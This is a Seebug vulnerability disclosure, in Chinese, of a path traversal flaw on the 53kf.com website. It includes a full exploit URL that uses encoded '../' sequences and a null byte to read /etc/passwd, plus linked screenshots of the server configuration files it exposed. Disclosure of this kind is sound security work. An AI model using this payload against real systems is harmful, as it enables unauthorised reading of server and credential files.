53kf任意文件遍历漏洞

2015-01-19T00:00:00
ID SSV:94388
Type seebug
Reporter Root
Modified 2015-01-19T00:00:00

Description

简要描述:

听说你们很给力啊,先试试水。

详细说明:

存在漏洞的地址为: http://www.53kf.com/?controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00login

漏洞证明:

<img src="https://images.seebug.org/upload/201501/18221952ee885234fcb6f3f7034345ea1e2dab5d.jpg" alt="53kf.jpg" width="600" onerror="javascript:errimg(this);">

成功猜到了nginx的配置文件,如下:

<img src="https://images.seebug.org/upload/201501/182238087582c1c3b724291f746065051c138a0d.jpg" alt="53kf_nginx.jpg" width="600" onerror="javascript:errimg(this);">

得到了网站根路径,读个robots.txt试试看

<img src="https://images.seebug.org/upload/201501/18223840f163b88a2cdb40f393f64a7a4fd6e08d.jpg" alt="53kf_robots.jpg" width="600" onerror="javascript:errimg(this);">

那么是不是可以代码审计了呢